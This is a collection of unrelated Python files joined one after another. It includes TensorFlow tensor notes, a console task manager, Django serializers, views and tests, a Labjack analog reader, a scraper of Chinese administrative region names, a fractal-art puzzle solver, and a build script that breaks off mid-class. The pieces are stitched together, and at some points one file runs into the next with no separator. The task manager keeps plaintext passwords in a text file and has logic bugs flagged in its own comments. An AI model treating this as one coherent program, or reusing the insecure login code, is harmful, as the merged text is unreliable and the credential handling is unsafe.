@error_handling
def get_tag(response, path):
    """Return the raw list of tag matches ('null' on failure)."""
    matches = response.xpath(path).extract()
    return matches
|
from rest_framework import serializers
from login_register.models import ContactMessage
class MessageSerializer(serializers.ModelSerializer):
    """Serializes ContactMessage instances for the contact API."""

    class Meta:
        model = ContactMessage
        fields = ('id', 'name', 'email', 'message')
        # id is assigned by the database and never client-writable
        read_only_fields = ('id',)
|
# Brief about tensors:
# - an nd-array
# - has GPU support
# - participates in the computational graph / backpropagation
# - immutable (tf.constant; tf.Variable at the bottom is mutable)
import os
import tensorflow as tf
# NOTE(review): TF_CPP_MIN_LOG_LEVEL must be set BEFORE importing
# tensorflow to suppress the C++ startup logs; here it is set after.
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "2"
# Rank 1 tensor
x = tf.constant([1,2,3])
# Rank 2
x = tf.constant([[1,2,3], [4,5,6]])
# NOTE(review): labeled "Rank 3" originally, but these are rank-2 (3,3) tensors
x = tf.ones((3,3))
x = tf.zeros((3,3))
x = tf.eye(3) # identity: diagonal filled with "1", elsewhere "0"
# Random tensor drawn from a normal distribution
x = tf.random.normal((3,3), mean=0, stddev=1)
# Uniform distribution
x = tf.random.uniform((3,3), minval=0, maxval=1) # values uniformly distributed
# Range tensor
x = tf.range(10)
# Cast tensor to another dtype
x = tf.cast(x, dtype=tf.float32)
# Operations on tensors
x = tf.constant([1,2,3])
y = tf.constant([4,5,6])
# element-wise add
z = tf.add(x,y)
# operator form of the same add
z = x+y
# subtraction
z = x-y
# division
z = x/y
# element-wise multiplication
z = x*y
# dot product (element-wise product, then sum)
z = tf.tensordot(x,y, axes=1)
# element-wise exponentiation (here: squaring)
z = x ** 2
# matrix multiplication (inner dims must match: (2,3) @ (3,4) -> (2,4))
x = tf.random.normal((2,3))
y = tf.random.normal((3,4))
z = tf.matmul(x,y)
# operator form of matmul
z = x @ y
# Slicing and indexing work like numpy or lists
x = tf.constant([[1,2,3,4], [5,6,7,8]]) # 2-d tensor
# access only the first row
# print(x[0])
# access all the rows in column 0
# print (x[:, 0])
# access only row 0 and all columns
# print (x[0, :])
# access row 0 and column 1
# print(x[0,1])
# original tensor to reshape
x = tf.random.normal((2,3))
# print(x)
# reshaping: the total element count must stay the same
x = tf.reshape(x, (3,2))
# print(x)
x = tf.reshape(x, (6)) # original (2,3) -> 6 values
# print(x)
# Convert x to a numpy array
x = x.numpy()
print(x)
print(type(x)) # <class 'numpy.ndarray'>
# convert back to a tensor
x = tf.convert_to_tensor(x)
print(type(x)) # <class 'tensorflow.python.framework.ops.EagerTensor'> (eager tensor)
# String tensor
x = tf.constant("chandan")
print(x)
# Multi-string tensor
x = tf.constant(["chandan", "sanjana"])
print(x)
# Constant tensors are immutable, but Variable tensors can be changed
x = tf.Variable([1,2,3])
print(x) # <tf.Variable 'Variable:0' shape=(3,) dtype=int32, numpy=array([1, 2, 3], dtype=int32)>
# Lists are defined like variables, but with square brackets around the items.
friends = ["Kevin", "Karen", "Jim", "Oscar", "Toby"]
# A list may mix strings, numbers and booleans; Python does not mind.
print(friends)
# Access individual elements by index; indexing starts at 0.
print(friends[0])
# Negative indices count from the end of the list (-1 is the last element).
print(friends[-1])
# Slicing grabs a range of elements; the end index is NOT included.
print(friends[1:3])
# Lists are mutable: elements can be reassigned in place.
friends[1] = "Mike"
print(friends[1])
|
#importing current date
from datetime import datetime

#opening user file
user_file = open("user.txt", "r+")

login = False
# Loop until the user supplies credentials that match a "user, password"
# line in user.txt.
while login == False:
    username = input("Enter your username: ")
    password = input("Enter your password: ")
    for lines in user_file:
        # FIX: strip the trailing newline before splitting -- otherwise the
        # stored password keeps its '\n' and can never match the typed one.
        valid_user, valid_password = lines.strip().split(", ")
        if valid_user == username and valid_password == password:
            login = True
            print("Logging in...")
        if valid_user != username and valid_password != password:
            # NOTE(review): this prints once per NON-matching line, not
            # once per failed attempt.
            print("Invalid login details")
    # rewind so the next attempt re-reads the whole file
    user_file.seek(0)
user_file.close()

#choices for the user to choose from
choices = input('''Select option one below:
r - register username
a - add task
va - view all tasks
vm - view my tasks
e - exit
s - stats
gr - general reports
''')
#if user selects admin selects "r" he can
#register a user to user_file
def reg_user():
    """Let the admin register a new user in user.txt (admin only)."""
    if username == "admin":
        new_userLogin = False
        new_usersName = input("Enter username: ")
        # NOTE(review): `regstr` is opened but never read or closed.
        regstr = open("user.txt", "r+")
        # NOTE(review): `lines` here is the leftover global from the login
        # loop, so only ONE stored user is compared against -- the
        # duplicate-username check is unreliable.
        v_user, v_password = lines.split(", ")
        while new_userLogin == False:
            if new_usersName != v_user:
                new_userPass = input("Enter password: ")
                validate = input("Confirm password: ")
            elif new_usersName == v_user:
                print("That username is unavailable. Pick another one")
                new_usersName = input("Enter username: ")
                new_userPass = input("Enter password: ")
                validate = input("Confirm password: ")
            if new_userPass == validate:
                new_userLogin = True
            if new_userPass != validate:
                print("password did not match. Try again")
        # passwords matched: append the new credentials to the file
        if new_userPass == validate:
            print("password matches. New user created")
            append_me = open("user.txt", "a")
            append_me.write("\n" + str(new_usersName) + ", " + str(validate))
            append_me.close()
    if username != "admin":
        print("Only admin can add a new user.")

if choices == "r":
    # NOTE(review): reg_user() returns None, so this prints "None".
    register = reg_user()
    print(register)
def add_task():
    """Prompt for a new task's fields and append them to tasks.txt as one
    comma-separated line."""
    # FIX: the original ended with `tasks.close` (missing parentheses), so
    # the file was never explicitly closed; `with` guarantees flush/close.
    with open("tasks.txt", "a") as tasks:
        assignee = input("Enter the usersname of assignee: ")
        title = input("Enter the title of the task: ")
        description = input("Enter task description: ")
        due_date = input("Enter task due date: ")
        date = datetime.now()   # assignment timestamp
        completed = "no"        # new tasks start incomplete
        tasks.write(str(assignee) + ", " + str(title) + ", " + str(description) + ", " + str(due_date)
                    + ", " + str(date) + ", " + str(completed) + "\n")

if choices == "a":
    adding_task = add_task()
    print(adding_task)
#if user selects "va" he will be given info
#of every file in an easy to read format
def view_all():
    """Print every task in tasks.txt in an easy-to-read layout."""
    # FIX: use a context manager so the file is closed even if a malformed
    # line makes the unpacking below raise.
    with open("tasks.txt", "r+") as tasks_file:
        for line in tasks_file:
            assignee, title, description, due_date, date, completed = line.split(", ")
            print(f'''
Name: {assignee}
Title: {title}
Description: {description}
Due Date: {due_date}
Date Assigned: {date}
Task Complete: {completed}
''')

if choices == "va":
    all_view = view_all()
    print(all_view)
#if user selects "vm" program
#will desplay specific user task
def view_mine():
    """Print only the logged-in user's tasks, then offer to edit one."""
    view = open("tasks.txt", "r")
    task_numb = 0
    for line in view:
        assignee, title, description, due_date, date, completed = line.split(", ")
        if username == assignee:
            task_numb += 1
            print(f'''
task number: {task_numb}
Name: {assignee}
Title: {title}
Description: {description}
Due Date: {due_date}
Date Assigned: {date}
Task Complete: {completed}
''')
    new_task = input("Would you like to edit a task?")
    if new_task != "-1":
        task_num = input("Please enter the task number: ")
        # NOTE(review): the file was already consumed by the for-loop, so
        # readlines() returns [] here; the edit feature is unfinished.
        task_file = view.readlines()
    view.close()

if choices == "vm":
    my_view = view_mine()
    print(my_view)

#if the user selects "e" program
#breaks
if choices == "e":
    print("closing program...")
    # NOTE(review): a bare `breakpoint` name is a no-op expression here;
    # the author likely intended to exit the program.
    breakpoint

#if user selects "s". number of tasks and
#number of users are displayed
if choices == "s":
    stats_file = open("tasks.txt", "r+")
    other_stats = open("tasks.txt", "r+")
    if username == "admin":
        num_title = 0
        num_assignee = 0
        # NOTE(review): this counts LINES, not distinct users.
        for line in stats_file:
            assignee, title, description, due_date, date, completed = line.split(", ")
            assignee  # NOTE(review): bare expression, no effect
            num_assignee += 1
        print(f'''
Total number of users: {num_assignee}
''')
        # NOTE(review): missing parentheses -- the file is never closed.
        stats_file.close
        for title in other_stats:
            assignee, title, description, due_date, date, completed = title.split(", ")
            title  # NOTE(review): bare expression, no effect
            num_title += 1
        print(f'''
Total number of tasks: {num_title}
''')
        other_stats.close()

#if the user select "gr"...
#the progaram writes and prints out the info
if choices == "gr":
    task_overview = open("task_overview.txt", "w+")
    user_overview = open("user_overview.txt", "w+")
    file_overview = open("tasks.txt", "r+")
    numOf_tasks = 0
    for tasks in file_overview:
        assignee, title, description, due_date, date, completed = tasks.split(", ")
        description  # NOTE(review): bare expression, no effect
        numOf_tasks += 1
    # NOTE(review): these counters are (re)set AFTER the loop, so only the
    # last line's `completed` value is ever tested; the report files above
    # are opened but never written. The feature appears unfinished.
    uncompleted_tasks = 0
    if completed == "no":
        uncompleted_tasks += 1
    completed_tasks = 0
    if completed == "yes":
        completed_tasks += 1
from django.test import TestCase
import datetime
from myuw.dao.category_links import _get_links_by_category_and_campus, \
_get_category_id
class TestCategoryLinks(TestCase):
    """Checks category-id resolution and per-campus link counts for the
    'Student & Campus Life' category."""

    def test_get_by_category_id(self):
        # Fix: assertEquals is the long-deprecated alias of assertEqual.
        category_id = _get_category_id("Student & Campus Life")
        self.assertEqual(category_id, "studentcampuslife")
        links = _get_links_by_category_and_campus(category_id, "seattle")
        self.assertEqual(len(links), 24)
        links = _get_links_by_category_and_campus(category_id, "bothell")
        self.assertEqual(len(links), 23)
        links = _get_links_by_category_and_campus(category_id, "tacoma")
        self.assertEqual(len(links), 22)
|
from django.shortcuts import render
# Create your views here.
from django.db import connections
from django.db.models import Count
from django.http import JsonResponse
from django.shortcuts import render
from .models import Censo
from django.db import connection
import os
import ujson
import pandas as pd
from .CrearJSON import *
# Project root: two directory levels above this file.
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# NOTE(review): backslash-joined paths are Windows-only; os.path.join
# would make these portable.
file_dir = BASE_DIR + "\\static\\json\\"
GEOJSON_Directory = file_dir + "GeoJson\\"
def graph(request):
    """Render the main graph page."""
    return render(request, 'graph/graph.html')
def INFO_Ubicacion(request):
    """Look up the pre-generated census + geographic JSON files matching
    the filters passed from the front end.

    :param request: carries GET params 'ubicacion' (location) and 'filtro'.
    :return: JsonResponse with keys 'Censo' (census data) and 'Geo'
        (geographic data) for that location/filter.
    """
    ubicacion = request.GET.get('ubicacion')
    filtro = request.GET.get('filtro')
    if ubicacion == 'Region':
        # region level uses the fixed, pre-built files
        file = file_dir + "Get_Info_Region.json"
        geofile = GEOJSON_Directory + "regioncenso2010.geojson"
    else:
        file = file_dir + ubicacion + "\\Get_Info_" + ubicacion + filtro + ".json"
        geofile = GEOJSON_Directory + ubicacion + "\\GeoJson" + filtro + ".geojson"
    with open(file) as f:
        censo_data = ujson.loads(f.read())
    with open(geofile) as f:
        geo_data = ujson.loads(f.read())
    payload = dict(Censo=censo_data, Geo=geo_data)
    return JsonResponse(payload, safe=False)
def INFO_Provincias(request):
    """Serve region-level census + geographic JSON, generating the source
    files first if they do not exist yet."""
    if not os.path.isfile(file_dir + "Get_Info_Region.json"):
        Crear_Archivos_JSON()
    if not os.path.isfile(GEOJSON_Directory + "regioncenso2010.geojson"):
        Crear_GeoJSON()
    # Load both pre-generated files and return them as one JSON payload.
    with open(file_dir + "Get_Info_Region.json") as f:
        censo_data = ujson.loads(f.read())
    with open(GEOJSON_Directory + "regioncenso2010.geojson") as f:
        geo_data = ujson.loads(f.read())
    payload = dict(Censo=censo_data, Geo=geo_data)
    return JsonResponse(payload, safe=False)
import sys
# Spelled-out digit names, indexed by digit value.
CONSTANTS = ['ZERO', 'ONE', 'TWO', 'THREE', 'FOUR', 'FIVE', 'SIX', 'SEVEN',
             'EIGHT', 'NINE']
# Per-digit counts filled in by _get_digits (module-level scratch state).
result_list = []
def remove_word(S, word):
    """Yield (reduced, count) pairs where `reduced` is S with each letter of
    `word` removed `count` times, for count = N down to 0 (N = the maximum
    number of removals S supports).

    Fix: the original's `i == 0` special case yielded (S, 0) and then fell
    through into the generic replace loop, yielding the same pair twice.
    """
    N = min(S.count(c) for c in word)
    for i in range(N, -1, -1):
        reduced = S
        for c in word:
            # remove at most i occurrences of each letter (no-op when i == 0)
            reduced = reduced.replace(c, '', i)
        yield (reduced, i)
def _get_digits(S, i):
    """Recursively decompose S into spelled-out digit names CONSTANTS[i:].

    On success, fills the global result_list with the removal count chosen
    for each digit and returns True; returns False if no decomposition of
    the remaining letters exists.
    """
    global result_list
    if i == 10:
        # ran out of digit names without consuming all of S
        return False
    for S1, count in remove_word(S, CONSTANTS[i]):
        if not S1:
            # every letter consumed -- record this digit's count and unwind
            result_list[i] = count
            return True
        if _get_digits(S1, i + 1):
            result_list[i] = count
            return True
    return False
def get_digits(S):
    """Return, in ascending order, the digits whose spelled-out English
    names together use exactly the letters of S."""
    global result_list
    result_list = [0] * 10
    _get_digits(S, 0)
    return ''.join(str(digit) * count
                   for digit, count in enumerate(result_list))
# Driver: first CLI argument is the input file; skip its header line and
# print one "Case #k: digits" line per test case.
lines = open(sys.argv[1]).readlines()[1:]
for i, S in enumerate(lines):
    result = get_digits(S.strip())
    print('Case #{}: {}'.format(i + 1, result))
|
import unittest
import liron.models # @UnusedImport
from liron.models.constants import VEGETARIAN, MEAT, MALE, FEMALE
from liron.models.persons import Educative, Madrich
from liron.models.seminar import Seminar, Camp, Hug, Ken, SecondKen
from liron.sort.default_constraints import VegetarianHardConstraint, \
MadrichHardConstraint, GenderRandomSoftConstraint, SizeRandomSoftConstraint, \
KenRandomSoftConstraint
class TestConstraints(unittest.TestCase):
    """Tests for the default sorting constraints, backed by a real
    (presumably in-memory) SQLAlchemy session.

    NOTE(review): this module targets Python 2 (xrange); assertEquals is
    the deprecated alias of assertEqual.
    """

    @classmethod
    def setUpClass(cls):
        # Create all tables once on the shared session/engine.
        from liron.models import session, engine, Base
        cls.session = session
        Base.metadata.create_all(engine)

    @classmethod
    def tearDown(cls):
        # NOTE(review): tearDown is conventionally an instance method;
        # declaring it a classmethod is unusual -- confirm it still runs
        # after each test as intended.
        cls.session.rollback()

    def create_seminar(self, num_of_camps, num_of_hugs):
        """Build a seminar with the given number of camps and hugs; hugs
        are assigned to camps round-robin."""
        seminar = Seminar()
        seminar.name = 'Seminar'
        self.session.add(seminar)
        for i in xrange(num_of_camps):
            camp = Camp()
            camp.name = 'Camp ' + str(i)
            camp.seminar = seminar
            self.session.add(camp)
        for i in xrange(num_of_hugs):
            hug = Hug()
            hug.name = 'Hug ' + str(i)
            hug.camp = seminar.camps[i % num_of_camps]
            self.session.add(hug)
        self.session.flush()
        return seminar

    def test_vegetarian(self):
        """A vegetarian must not be valid in a meat-serving hug."""
        aviad = Educative()
        aviad.first_name = 'Aviad'
        aviad.food = VEGETARIAN
        self.session.add(aviad)
        seminar = self.create_seminar(1, 1)
        hug = seminar.camps[0].hugs[0]
        hug.food = MEAT
        aviad.hug = hug
        constraint = VegetarianHardConstraint()
        self.assertTrue(not constraint.is_valid(aviad, [aviad], [hug]))

    def test_madrich(self):
        """An educative must not share a hug with a madrich from their ken."""
        ken = Ken()
        ken.name = 'Misgav'
        seminar = self.create_seminar(1, 1)
        hug = seminar.camps[0].hugs[0]
        aviad = Educative()
        aviad.first_name = 'Aviad'
        aviad.ken = ken
        aviad.hug = hug
        madrich = Madrich()
        madrich.first_name = 'Cool'
        madrich.last_name = 'Guy'
        madrich.ken = ken
        madrich.hug = hug
        constraint = MadrichHardConstraint()
        self.assertTrue(not constraint.is_valid(aviad, [aviad], seminar))

    def test_gender_constant(self):
        """Gender-balance soft constraint: expected score 30 for this split."""
        constraint = GenderRandomSoftConstraint(10, 10, 10)
        seminar = self.create_seminar(1, 2)
        hugs = seminar.camps[0].hugs
        educative1 = Educative()
        educative1.gender = MALE
        educative1.hug = hugs[0]
        educative2 = Educative()
        educative2.gender = FEMALE
        educative2.hug = hugs[0]
        educative3 = Educative()
        educative3.gender = FEMALE
        educative3.hug = hugs[1]
        score = constraint.calculate_score([educative1, educative2, educative3], seminar)
        self.assertEquals(score, 30)

    def test_size_constant(self):
        """Size-balance soft constraint: expected score 50 for a 2/1 split."""
        constraint = SizeRandomSoftConstraint(10, 10, 10)
        seminar = self.create_seminar(1, 2)
        hugs = seminar.camps[0].hugs
        educative1 = Educative()
        educative1.hug = hugs[0]
        educative2 = Educative()
        educative2.hug = hugs[0]
        educative3 = Educative()
        educative3.hug = hugs[1]
        score = constraint.calculate_score([educative1, educative2, educative3], seminar)
        self.assertEquals(score, 50)

    def test_ken_constant(self):
        """Ken-mixing soft constraint with a second ken: expected score 70."""
        constraint = KenRandomSoftConstraint(10, 10, 10)
        seminar = self.create_seminar(1, 2)
        hugs = seminar.camps[0].hugs
        ken1 = Ken()
        ken1.name = "A"
        ken2 = Ken()
        ken2.name = "B"
        second_ken = SecondKen()
        second_ken.name = "c"
        self.session.add(ken1)
        self.session.add(ken2)
        self.session.add(second_ken)
        educative1 = Educative()
        educative1.ken = ken1
        educative1.hug = hugs[0]
        self.session.add(educative1)
        educative2 = Educative()
        educative2.ken = ken1
        educative2.hug = hugs[0]
        self.session.add(educative2)
        educative3 = Educative()
        educative3.ken = ken1
        educative3.hug = hugs[1]
        self.session.add(educative3)
        educative4 = Educative()
        educative4.ken = ken2
        educative4.second_ken = second_ken
        educative4.hug = hugs[1]
        self.session.add(educative4)
        score = constraint.calculate_score([educative1, educative2, educative3, educative4], seminar)
        self.assertEquals(score, 70)

if __name__ == '__main__':
    unittest.main()
"""A Class to facilitate continual reading and averaging of
Labjack Analog inputs.
"""
import time
import threading
import traceback
import sys
import numpy as np
class AnalogChannel:
    """One Labjack analog input plus a ring buffer of its recent readings."""

    def __init__(self, lj_device, channel_number, long_settle=True, ring_buffer_size=20):
        """Parameters:
        lj_device: Labjack device object to read from, e.g. a U3protected.
        channel_number: analog input channel number.
        long_settle: if True, read the channel in Long Settle mode.
        ring_buffer_size: number of readings kept in the ring buffer.
        """
        self.lj_device = lj_device
        self.channel_number = channel_number
        self.long_settle = long_settle
        self.ring_buffer_size = ring_buffer_size
        self.ring_buffer = np.zeros(ring_buffer_size)
        # True until the very first reading has been taken.
        self.first_read = True
        # Index of the next ring-buffer slot to overwrite.
        self.ix = 0

    def read(self):
        """Take one reading, push it into the ring buffer, and return it."""
        reading = self.lj_device.get_analog(self.channel_number, self.long_settle)
        if not self.first_read:
            self.ring_buffer[self.ix] = reading
        else:
            # Seed the whole buffer with the first value so the average
            # starts out sensible.
            self.ring_buffer[:] = reading
            self.first_read = False
        # advance the write index, wrapping around at the buffer end
        self.ix = (self.ix + 1) % self.ring_buffer_size
        return reading

    def value(self):
        """Average of the readings currently held in the ring buffer."""
        return self.ring_buffer.mean()
class AnalogReader(threading.Thread):
    """Daemon thread that continually reads a set of analog channels and
    exposes the ring-buffer-averaged value of each one.
    """

    def __init__(self, lj_device, channel_list, read_spacing=4.0, ring_buffer_size=20):
        """Parameters:
        lj_device: Labjack device object such as U3protected or one with a
            similar interface.
        channel_list: list of (channel number, long settle boolean) tuples,
            e.g. [(14, True), (16, False)]. Long Settle = True allows a
            higher source impedance at the cost of a slower read.
        read_spacing: number of milliseconds to sleep between analog
            readings, letting other threads access the Labjack in between.
        ring_buffer_size: readings held per channel; their average is the
            channel's reported value. Larger buffers suppress noise better
            but respond more slowly.

        Long Settle readings on the Labjack U3 take about 4 ms and allow a
        source impedance of 200 K-ohms on the U3-LV. Normal readings take
        0.7 ms but limit source impedance to 10K on the U3-LV. For the
        U3-HV the source impedance must always be 1 K-ohm or less.
        """
        # daemon thread so it shuts down when the program ends
        threading.Thread.__init__(self, daemon=True)
        self.channel_list = channel_list
        # One AnalogChannel object per requested channel.
        self.channel_objects = [
            AnalogChannel(lj_device, ch, ls, ring_buffer_size) for ch, ls in channel_list
        ]
        self.read_spacing = read_spacing
        self.ring_buffer_size = ring_buffer_size

    def run(self):
        """Thread body: read every channel forever, sleeping between reads."""
        while True:
            for ch in self.channel_objects:
                try:
                    ch.read()
                # FIX: the bare `except:` also swallowed SystemExit and
                # KeyboardInterrupt; catch only genuine errors.
                except Exception:
                    traceback.print_exc(file=sys.stdout)
                finally:
                    time.sleep(self.read_spacing / 1000.)

    def values(self):
        """Return {channel_number: ring-buffer average} for all channels.

        Channels whose average cannot be computed are omitted (the error is
        printed to stdout).
        """
        values = {}
        for ch in self.channel_objects:
            try:
                values[ch.channel_number] = ch.value()
            except Exception:
                traceback.print_exc(file=sys.stdout)
        return values
|
# Field-name mapping: keys are champion-JSON field names (apparently the
# League of Legends Data Dragon schema -- TODO confirm), values are the
# shorter column names used internally.
datamapper = {
    "stats": {
        "hp": "hp",
        "hpperlevel": "hp_lvl",
        "mp": "mana",
        "mpperlevel": "mana_lvl",
        "movespeed": "ms",
        "armor": "armor",
        "armorperlevel": "armor_lvl",
        "spellblock": "mr",
        "spellblockperlevel": "mr_lvl",
        "attackrange": "range",
        "hpregen": "hpregen",
        "hpregenperlevel": "hpregen_lvl",
        "mpregen": "mregen",
        "mpregenperlevel": "mregen_lvl",
        "attackdamage": "ad",
        "attackdamageperlevel": "ad_lvl",
        "attackspeed": "as",
        "attackspeedperlevel": "as_lvl",
    },
    # positional target names for the champion's tag list
    "tags": [
        "attribute",
        "attribute2"
    ],
    "partype": "resource",
    "title": "title"
}
|
# @Time : 2021/4/116:54
# @Author : 周云鹏
# @File : area.PY
import requests
import lxml.html
import pandas as pd
# `data` accumulates every province, city and county name scraped below.
data = []
base_url = 'http://www.stats.gov.cn/tjsj/tjbz/tjyqhdmhcxhfdm/2020/'
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '
                         'Chrome/89.0.4389.90 Safari/537.36'}
# Fetch the province index page (the site is GB2312-encoded).
province_urls_responses = requests.get(base_url + 'index.html', headers=headers)
province_urls_responses.encoding = 'gb2312'
province_urls_etree = lxml.html.etree.HTML(province_urls_responses.text)
province_urls = province_urls_etree.xpath('//tr[@class="provincetr"]/td/a/@href')
provinces = province_urls_etree.xpath('//tr[@class="provincetr"]/td/a/text()')
data += provinces  # add the province names
# Crawl the prefecture-level cities under each province.
for i in province_urls:
    city_url = base_url + i
    city_responses = requests.get(city_url, headers=headers)
    city_responses.encoding = 'gb2312'
    county_urls_etree = lxml.html.etree.HTML(city_responses.text)
    # print(city_responses.text)
    county_urls = county_urls_etree.xpath("//tr[@class='citytr']/td[2]/a/@href")
    cities = county_urls_etree.xpath("//tr[@class='citytr']/td[2]/a/text()")
    # print(cities)
    data += cities  # add the city names
    # Crawl the counties/districts under each city.
    for j in county_urls:
        county_url = base_url + j
        county_responses = requests.get(county_url, headers=headers)
        county_responses.encoding = 'gb2312'
        r_urls_etree = lxml.html.etree.HTML(county_responses.text)
        # county_urls = r_urls_etree.xpath("//tr[@class='citytr']/td[2]/a/@href")
        county = r_urls_etree.xpath("//tr[@class='countytr']/td[2]/a/text()")
        print(f'正在爬取{county}')
        data += county  # add the county names
# Persist everything as a single-column CSV.
pd.DataFrame(columns=['area'], data=data).to_csv('area.csv')
|
from django.contrib import admin
from vutman.models import EmailDomain, EmailServer, EmailUser, EmailAlias
from simple_history.admin import SimpleHistoryAdmin
# Register each e-mail model with the admin, all with change-history support.
for model in (EmailDomain, EmailServer, EmailUser, EmailAlias):
    admin.site.register(model, SimpleHistoryAdmin)
|
# user.py
from library import Base
###### 1.
# user code used some function defined in libray, here `foo`
# to avoid crash before exectute this function, we can check if method exist using `hasattr`
##
# assert hasattr(Base, 'foo'), "foo doesn't exist in base class"
# class Derived(Base):
# def bar(self):
# return self.foo()
###### 2.
##
class Derived(Base):
    """Subclass of Base demonstrating an override-free extra method."""

    def bar(self):
        # Fixed return value; does not rely on anything from Base.
        result = 'bar'
        return result
|
from django.shortcuts import render
from django.http import HttpResponse
from main.models import Item, ToDoList, Transportation
# Create your views here.
def index(response, name):
    """Render a plain-HTML summary of one to-do list: its items and transportations."""
    todo_list = ToDoList.objects.get(name=name)
    item_text = ", ".join(entry.text for entry in todo_list.item_set.all())
    transport_text = ", ".join(entry.type for entry in todo_list.transportation_set.all())
    return HttpResponse("<h1>%s</h1><br>Items: %s<br>Transportations: %s" % (todo_list.name, item_text, transport_text))
|
#!/usr/bin/env python3
import doctest
import itertools as it
import sys
import typing
# Fixed 3x3 starting pattern from the puzzle statement.
START_GRID = [['.', '#', '.'],
              ['.', '.', '#'],
              ['#', '#', '#']]
# Example enhancement rules exercised by the doctests below.
TEST_RULES = """../.# => ##./#../...
.#./..#/### => #..#/..../..../#..#"""
# A Grid is a square list of rows of '.'/'#' characters; Rules maps a
# pattern string (rows joined by '/') to its enhanced pattern string.
Grid = typing.List[typing.List[str]]
Rules = typing.Dict[str, str]
def pattern_to_grid(pattern: str) -> Grid:
    """Convert a pattern description to a grid.

    >>> pattern_to_grid('../.#')
    [['.', '.'], ['.', '#']]
    """
    rows = pattern.split("/")
    return [list(row) for row in rows]
def grid_to_pattern(grid: Grid) -> str:
    """Convert a grid to a pattern.

    >>> grid_to_pattern([['.', '.'], ['.', '#']])
    '../.#'
    """
    rows = ("".join(row) for row in grid)
    return "/".join(rows)
def rotate_grid(grid: Grid) -> Grid:
    """Rotate a grid clockwise by 90 degrees.

    >>> rotate_grid([['.', '.'], ['.', '#']])
    [['.', '.'], ['#', '.']]
    """
    # Reversing the row order and transposing is a 90-degree clockwise turn.
    return [list(column) for column in zip(*grid[::-1])]
def flip_grid(grid: Grid) -> Grid:
    """Flip a grid.

    >>> flip_grid([['.', '#'], ['.', '#']])
    [['#', '.'], ['#', '.']]
    """
    # Horizontal mirror: reverse every row.
    return [list(reversed(row)) for row in grid]
def rotate_pattern(pattern: str) -> str:
    """Rotate a pattern clockwise by 90 degrees.

    >>> rotate_pattern('../.#')
    '../#.'
    >>> rotate_pattern('.#./..#/###')
    '#../#.#/##.'
    """
    grid = pattern_to_grid(pattern)
    rotated = rotate_grid(grid)
    return grid_to_pattern(rotated)
def flip_pattern(pattern: str) -> str:
    """Flip a pattern.

    >>> flip_pattern('.#./..#/###')
    '.#./#../###'
    """
    grid = pattern_to_grid(pattern)
    flipped = flip_grid(grid)
    return grid_to_pattern(flipped)
def parse_rules(data: str) -> Rules:
    """Parse enhancement rules.

    Every rotation and flip of a source pattern maps to the same result,
    so a single lookup suffices during iteration.

    >>> list(parse_rules('../.# => ##./#../...').keys())
    ['../.#', '../#.', '#./..', '.#/..']
    """
    rules = {}
    for line in data.splitlines():
        pattern, res = line.split(" => ")
        current = pattern
        for _ in range(4):
            rules[current] = res
            rules[flip_pattern(current)] = res
            current = rotate_pattern(current)
    return rules
def subgrid(grid: Grid, size: int, x: int, y: int) -> Grid:
    """Get a subgrid."""
    # Slice size rows starting at y, then size columns starting at x.
    return [row[x:x + size] for row in grid[y:y + size]]
def fractal_iteration(grid: Grid, rules: Rules) -> Grid:
    """Perform a single iteration of the fractal art process.

    The grid is cut into 2x2 squares (even size) or 3x3 squares (size
    divisible by 3); each square is replaced by its enhanced (sqsz+1)
    counterpart from the rules, producing a larger output grid.

    >>> grid_to_pattern(fractal_iteration(START_GRID, parse_rules(TEST_RULES)))
    '#..#/..../..../#..#'
    """
    size = len(grid)
    if size % 2 == 0:
        sqsz = 2
    elif size % 3 == 0:
        sqsz = 3
    else:
        # Size divisible by neither 2 nor 3: nothing can be enhanced.
        return grid
    # Split in squares
    new_sqsz = sqsz + 1
    new_size = (size // sqsz) * new_sqsz
    new_grid = [[''] * new_size for _ in range(new_size)]
    for x, y in it.product(range(size // sqsz), repeat=2):
        # Copy one source square out of the grid.
        square = [[''] * sqsz for _ in range(sqsz)]
        for xx, yy in it.product(range(sqsz), repeat=2):
            square[yy][xx] = grid[y * sqsz + yy][x * sqsz + xx]
        # Look up its enhanced replacement by pattern string.
        patt = grid_to_pattern(square)
        new_square = pattern_to_grid(rules[patt])
        # Write the enlarged square into the output grid.
        for xx, yy in it.product(range(new_sqsz), repeat=2):
            new_grid[y * new_sqsz + yy][x * new_sqsz + xx] = new_square[yy][xx]
    return new_grid
def count_pixels(data: str, iterations: int = 5) -> int:
    """Count active pixels after a few iterations.

    >>> count_pixels(TEST_RULES, 2)
    12
    """
    rules = parse_rules(data)
    grid = START_GRID
    for _ in range(iterations):
        grid = fractal_iteration(grid, rules)
    return grid_to_pattern(grid).count('#')
if __name__ == "__main__":
    # Run the module doctests first; only report when everything passed.
    err, tot = doctest.testmod()
    if err == 0:
        print("{} tests OK :]".format(tot))
    # Each command-line argument is a rules file; solve both puzzle parts.
    for fn in sys.argv[1:]:
        with open(fn, "r") as fin:
            data = fin.read().strip()
        print("Pixels on for %s (5 iterations): %d" %
              (fn, count_pixels(data, 5)))
        print("Pixels on for %s (18 iterations): %d" %
              (fn, count_pixels(data, 18)))
|
#!/usr/bin/env python3
import urllib.request
import os
import zipfile
import sys
import argparse
import re
import subprocess
###############################################################################
## Classes
class TextReplacer:
    """Ordered list of plain-text (search, replacement) pairs.

    Pairs are applied with str.replace in insertion order, so later
    pairs see the output of earlier ones.
    """

    def __init__(self):
        self.res = []

    def add(self, reg: str, rep: str):
        """Append a search/replacement pair; returns self to allow chaining."""
        self.res.append((reg, rep))
        return self

    def replace(self, text: str) -> str:
        """Apply every registered pair to *text* and return the result."""
        for search, replacement in self.res:
            text = text.replace(search, replacement)
        return text
class Settings:
    """Bundle of the build's paths and options (see setup())."""

    def __init__(self, root: str, install_dist: str, install: str, wx_root: str, build: str, appveyor_msbuild: str, platform: str):
        self.root = root
        self.install_dist = install_dist
        self.install = install
        self.wx_root = wx_root
        self.build = build
        self.appveyor_msbuild = appveyor_msbuild
        self.platform = platform

    def print(self):
        """Dump every setting to stdout for debugging."""
        for label, value in (('root', self.root),
                             ('install_dist', self.install_dist),
                             ('install', self.install),
                             ('wx_root', self.wx_root),
                             ('build', self.build),
                             ('appveyor_msbuild', self.appveyor_msbuild),
                             ('platform', self.platform)):
            print(label + ':', value)

    def is_appveyor(self) -> bool:
